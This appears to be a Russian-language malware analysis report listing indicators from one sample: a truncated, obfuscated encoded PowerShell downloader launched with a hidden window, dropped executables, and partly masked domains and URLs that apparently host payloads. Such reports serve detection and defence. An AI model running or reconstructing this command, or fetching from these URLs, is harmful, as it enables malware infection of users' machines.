Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAMQBlADUAcgByAD0AKAAnAEwAJwArACcAZwBkACcAKwAoACcAZABsACcAKwAnAGIAbQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAGUAcgBQAHIAbwBmAEkATABFAFwAUAAwAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\882185.cvr
- %HOMEPATH%\p0btst0\n34vr3o\f3j2mdem1.exe
- %HOMEPATH%\p0btst0\n34vr3o\f3j2mdem1.exe
- 'da######ertecnologia.com.br':80
- 'da######ertecnologia.com.br':443
- 'ol###aterlik.de':80
- 'pi####ebymucha.de':80
- 'st###n-els.de':80
- 'si###yorange.de':80
- 'sm####ksystems.ca':443
- 'sp###-kies.de':80
- 'sp###-kies.de':443
- http://da######ertecnologia.com.br/model/ULr/
- http://ol###aterlik.de/live/wjeos17/
- http://pi####ebymucha.de/Galerie/vo2uc9o42182780/
- http://st###n-els.de/cgi-bin/attach/GxmkA/
- http://si###yorange.de/_offset/AICNxQKBJmdw/
- http://sp###-kies.de/___backup/4c671x1sqjbux01284753/
- 'da######ertecnologia.com.br':443
- 'sm####ksystems.ca':443
- 'sp###-kies.de':443
- DNS ASK da######ertecnologia.com.br
- DNS ASK ol###aterlik.de
- DNS ASK pi####ebymucha.de
- DNS ASK st###n-els.de
- DNS ASK si###yorange.de
- DNS ASK sm####ksystems.ca
- DNS ASK sp###-kies.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAMQBlADUAcgByAD0AKAAnAEwAJwArACcAZwBkACcAKwAoACcAZABsACcAKwAnAGIAbQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAGUAcgBQAHIAbwBmAEkATABFAFwAUAAwAE...' (со скрытым окном)